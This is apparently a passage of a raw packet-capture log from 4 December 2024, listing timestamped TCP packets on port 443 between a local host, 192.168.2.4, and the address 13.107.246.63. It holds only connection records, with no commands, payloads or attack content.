                                                                                                                                                                                  Dec 4, 2024 11:11:53.899188042 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:54.127114058 CET4434999113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:54.127186060 CET4434999113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:54.127278090 CET49991443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:54.127427101 CET49991443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:54.127440929 CET4434999113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:54.127450943 CET49991443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:54.127456903 CET4434999113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:54.130338907 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:54.130373001 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:54.130464077 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:54.130646944 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:54.130661964 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.504689932 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.505717039 CET49992443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:55.505742073 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.506397963 CET49992443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:55.506405115 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.519927025 CET4434999313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.520571947 CET49993443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:55.520591974 CET4434999313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.521157026 CET49993443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:55.521162987 CET4434999313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.680490971 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.681065083 CET49994443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:55.681087017 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.681493998 CET49994443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:55.681498051 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.864943981 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.868603945 CET49967443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:55.868618965 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.869036913 CET49967443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:55.869041920 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.914567947 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.915026903 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:55.915047884 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.915524006 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:55.915530920 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.948823929 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.952006102 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.952081919 CET49992443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:55.952110052 CET49992443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:55.952126026 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.952143908 CET49992443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:55.952148914 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.954683065 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:55.954705954 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.954770088 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:55.954931974 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:55.954945087 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.957427025 CET4434999313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.957452059 CET4434999313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.957499981 CET49993443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:55.957513094 CET4434999313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.957555056 CET49993443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:55.957691908 CET49993443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:55.957698107 CET4434999313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.957711935 CET49993443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:55.957835913 CET4434999313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.957859993 CET4434999313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.957900047 CET49993443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:55.959538937 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:55.959589005 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:55.959647894 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:55.959764004 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:55.959778070 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:56.147330046 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:56.147360086 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:56.147413015 CET49994443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:56.147413969 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:56.147461891 CET49994443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:56.147856951 CET49994443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:56.147856951 CET49994443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:56.147871017 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:56.147882938 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:56.151618958 CET49998443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:56.151645899 CET4434999813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:56.151707888 CET49998443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:56.151918888 CET49998443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:56.151932001 CET4434999813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:56.299464941 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:56.304172039 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:56.308211088 CET49967443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:56.308211088 CET49967443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:56.308255911 CET49967443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:56.308271885 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:56.312124968 CET49999443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:56.312155962 CET4434999913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:56.312407970 CET49999443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:56.312483072 CET49999443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:56.312489986 CET4434999913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:56.405373096 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:56.405402899 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:56.405424118 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:56.405520916 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:56.405522108 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:56.405550003 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:56.405648947 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:56.565195084 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:56.565296888 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:56.565325975 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:56.565510988 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:56.565625906 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:56.565625906 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:56.565642118 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:56.565651894 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:56.576111078 CET50000443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:56.576142073 CET4435000013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:56.576386929 CET50000443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:56.576641083 CET50000443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:56.576656103 CET4435000013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:57.738010883 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:57.738599062 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:57.738611937 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:57.739029884 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:57.739033937 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:57.740042925 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:57.740283966 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:57.740309000 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:57.740626097 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:57.740636110 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:57.934490919 CET4434999813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:57.935656071 CET49998443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:57.935694933 CET4434999813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:57.936218023 CET49998443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:57.936227083 CET4434999813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.028902054 CET4434999913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.029372931 CET49999443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.029391050 CET4434999913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.029803991 CET49999443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.029809952 CET4434999913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.184182882 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.184205055 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.184319019 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.184354067 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.184542894 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.184550047 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.184576035 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.184710979 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.184737921 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.184778929 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.187047005 CET50001443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.187088966 CET4435000113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.187155008 CET50001443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.187309980 CET50001443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.187326908 CET4435000113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.234200954 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.234230995 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.234247923 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.234293938 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.234322071 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.234338045 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.234360933 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.358686924 CET4435000013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.359149933 CET50000443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.359209061 CET4435000013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.359689951 CET50000443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.359709978 CET4435000013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.387470961 CET4434999813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.387504101 CET4434999813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.387561083 CET49998443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.387588978 CET4434999813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.387634993 CET49998443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.387813091 CET49998443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.387820005 CET4434999813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.387841940 CET49998443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.387979984 CET4434999813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.388009071 CET4434999813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.388067961 CET49998443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.390367985 CET50002443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.390412092 CET4435000213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.390602112 CET50002443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.390762091 CET50002443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.390782118 CET4435000213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.417385101 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.417431116 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.417457104 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.417471886 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.417490959 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.417510033 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.417534113 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.417609930 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.417625904 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.417634964 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.417642117 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.419838905 CET50003443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.419869900 CET4435000313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.420133114 CET50003443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.420306921 CET50003443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.420320988 CET4435000313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.469634056 CET4434999913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.469657898 CET4434999913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.469712973 CET49999443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.469723940 CET4434999913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.469938040 CET49999443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.469950914 CET4434999913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.469959021 CET49999443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.470096111 CET4434999913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.470125914 CET4434999913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.470165014 CET49999443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.473139048 CET50004443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.473165035 CET4435000413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.473211050 CET50004443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.473448992 CET50004443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.473464012 CET4435000413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.802449942 CET4435000013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.806041002 CET4435000013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.806126118 CET50000443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.806175947 CET50000443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.806175947 CET50000443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.806197882 CET4435000013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.806209087 CET4435000013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.808923006 CET50005443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.808980942 CET4435000513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:58.809175968 CET50005443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.809334040 CET50005443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:58.809348106 CET4435000513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:59.968425989 CET4435000113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:59.969052076 CET50001443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:59.969070911 CET4435000113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:59.969721079 CET50001443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:59.969726086 CET4435000113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.106287956 CET4435000213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.111001968 CET50002443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.111032963 CET4435000213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.111546993 CET50002443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.111552000 CET4435000213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.138664007 CET4435000313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.142677069 CET50003443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.142704964 CET4435000313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.143002987 CET50003443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.143009901 CET4435000313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.190876961 CET4435000413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.192318916 CET50004443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.192370892 CET4435000413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.192830086 CET50004443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.192837000 CET4435000413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.412751913 CET4435000113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.412831068 CET4435000113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.412905931 CET50001443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.413162947 CET50001443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.413162947 CET50001443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.413182020 CET4435000113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.413191080 CET4435000113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.420121908 CET50006443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.420176029 CET4435000613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.423389912 CET50006443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.423389912 CET50006443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.423430920 CET4435000613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.524919987 CET4435000513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.525919914 CET50005443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.525949955 CET4435000513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.528114080 CET50005443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.528130054 CET4435000513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.541520119 CET4435000213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.544465065 CET4435000213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.544603109 CET50002443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.544603109 CET50002443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.544644117 CET50002443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.544661999 CET4435000213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.552120924 CET50007443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.552176952 CET4435000713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.555357933 CET50007443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.555357933 CET50007443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.555418968 CET4435000713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.573072910 CET4435000313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.576723099 CET4435000313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.576853037 CET50003443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.576853037 CET50003443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.576946020 CET50003443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.576966047 CET4435000313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.579526901 CET50008443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.579580069 CET4435000813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.579751015 CET50008443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.582179070 CET50008443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.582209110 CET4435000813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.626677990 CET4435000413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.630148888 CET4435000413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.630201101 CET4435000413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.630312920 CET50004443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.630362034 CET50004443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.630362034 CET50004443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.630379915 CET4435000413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.630400896 CET4435000413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.960424900 CET4435000513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.963917017 CET4435000513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.964046955 CET50005443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.964095116 CET50005443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.964095116 CET50005443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:00.964116096 CET4435000513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:00.964126110 CET4435000513.107.246.63192.168.2.4
